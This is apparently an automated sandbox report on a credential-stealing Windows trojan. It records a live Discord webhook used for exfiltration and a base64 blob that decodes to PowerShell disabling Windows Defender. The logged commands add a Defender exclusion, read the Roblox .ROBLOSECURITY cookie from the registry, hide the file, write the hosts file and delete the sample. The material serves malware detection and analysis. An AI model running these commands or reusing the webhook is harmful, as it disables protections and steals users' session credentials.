Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N
Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49707 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File written: C:\Windows\System32\drivers\etc\hosts

                        System Summary

                        Source: IDLBk4XMUa.exe, type: SAMPLE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: IDLBk4XMUa.exe, 00000000.00000000.1255650381.00000200961AC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename vs IDLBk4XMUa.exe
                        Source: IDLBk4XMUa.exe | Binary or memory string: OriginalFilename vs IDLBk4XMUa.exe
                        Source: IDLBk4XMUa.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: IDLBk4XMUa.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: IDLBk4XMUa.exe, ------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: IDLBk4XMUa.exe, ------.cs | Base64 encoded string: 'JiZudleSP7ManqLwYD6fZEaRcprwRVawbHjadwJGoLDOw0lVHISBlyhSuJxWxvZJegzQWBN2LCdjOCCxmJpB7XVMgk6KgiP+1XhLA5dVuLvp8x33HNNC00vzNwqIMYahc50Tg5SJ4v/L8a1/OklBQgBUSkTOo+Gsl/eOhu6ucTGFqolLSrPnzgeET0s0'
                        Source: NcIxl.scr.0.dr, ------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: NcIxl.scr.0.dr, ------.cs | Base64 encoded string: 'JiZudleSP7ManqLwYD6fZEaRcprwRVawbHjadwJGoLDOw0lVHISBlyhSuJxWxvZJegzQWBN2LCdjOCCxmJpB7XVMgk6KgiP+1XhLA5dVuLvp8x33HNNC00vzNwqIMYahc50Tg5SJ4v/L8a1/OklBQgBUSkTOo+Gsl/eOhu6ucTGFqolLSrPnzgeET0s0'
                        Source: NcIxl.scr.0.dr, ------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: NcIxl.scr.0.dr, ------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: IDLBk4XMUa.exe, ------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: IDLBk4XMUa.exe, ------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@39/24@3/2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IDLBk4XMUa.exe.log
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Mutant created: \Sessions\1\BaseNamedObjects\ee04PtQO8zB6PJxMASmK
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File created: C:\Users\user\AppData\Local\Temp\nlQT11xVcC5SHaK
                        Source: IDLBk4XMUa.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: IDLBk4XMUa.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.000002009864D000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1906042721.00000200B0975000.00000004.00000020.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200985DB000.00000004.00000800.00020000.00000000.sdmp, tlf64c2jHarKcpu.0.dr, oFhYVgGK4pGWvb1.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: IDLBk4XMUa.exe | Virustotal: Detection: 86%
                        Source: IDLBk4XMUa.exe | ReversingLabs: Detection: 81%
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File read: C:\Users\user\Desktop\IDLBk4XMUa.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\IDLBk4XMUa.exe "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                        Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: rasapi32.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: rasman.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: rtutils.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: secur32.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: schannel.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ntasn1.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ncrypt.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: dpapi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: sxs.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: devenum.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: devobj.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: msdmo.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Section loaded: windowscodecs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
                        Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
